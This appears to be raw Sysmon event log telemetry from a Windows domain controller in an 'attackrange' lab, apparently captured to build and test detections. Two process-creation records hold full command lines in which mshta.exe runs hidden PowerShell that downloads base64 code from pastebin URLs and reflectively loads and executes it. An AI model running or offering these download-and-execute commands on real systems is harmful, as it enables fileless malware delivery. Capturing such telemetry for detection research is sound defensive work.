10341000x8000000000000000107199Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.756{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107198Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.740{58E9C193-B4BD-615A-5502-00000000FC01}47286644C:\Windows\system32\conhost.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107197Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.740{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.740{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.725{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5302-00000000FC01}1480C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.725{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5302-00000000FC01}1480C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.719{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5502-00000000FC01}4728C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.702{58E9C193-B4BD-615A-5302-00000000FC01}14805200C:\Windows\system32\conhost.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083283Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:01.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B7F24B97A02A0987729D5ADC8DA221,SHA256=27564F307E711D6A9AD19BCAC9AAA38D8B8300C056F862C52F9A230B82D4DBE3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.686{58E9C193-B4BD-615A-5002-00000000FC01}44087408C:\Windows\system32\mshta.exe{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.687{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.671{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5302-00000000FC01}1480C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 17141700x8000000000000000107182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 08:01:01.655{58E9C193-B4BD-615A-4E02-00000000FC01}6168\PSHost.132778080613299004.6168.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000107181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.655{58E9C193-B4BD-615A-5102-00000000FC01}54487404C:\Windows\system32\mshta.exe{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.657{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%%$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 23542300x8000000000000000107175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.587{58E9C193-B4BD-615A-4E02-00000000FC01}6168ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_s1foee1w.gbf.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.587{58E9C193-B4BD-615A-4E02-00000000FC01}6168ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ri51m1wq.dku.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.587{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F7AA3B117669FCCF8237A003EC4587F,SHA256=FE64B6B76BB53CD648B4F5E17FE1FBC6FB99901602C4310B2DD7869D8E02F979,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.571{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.555{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.555{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B4BD-615A-5002-00000000FC01}4408C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.540{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B4BD-615A-5102-00000000FC01}5448C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:01.540{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ri51m1wq.dku.ps12021-10-04 08:01:01.540 10341000x8000000000000000107167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 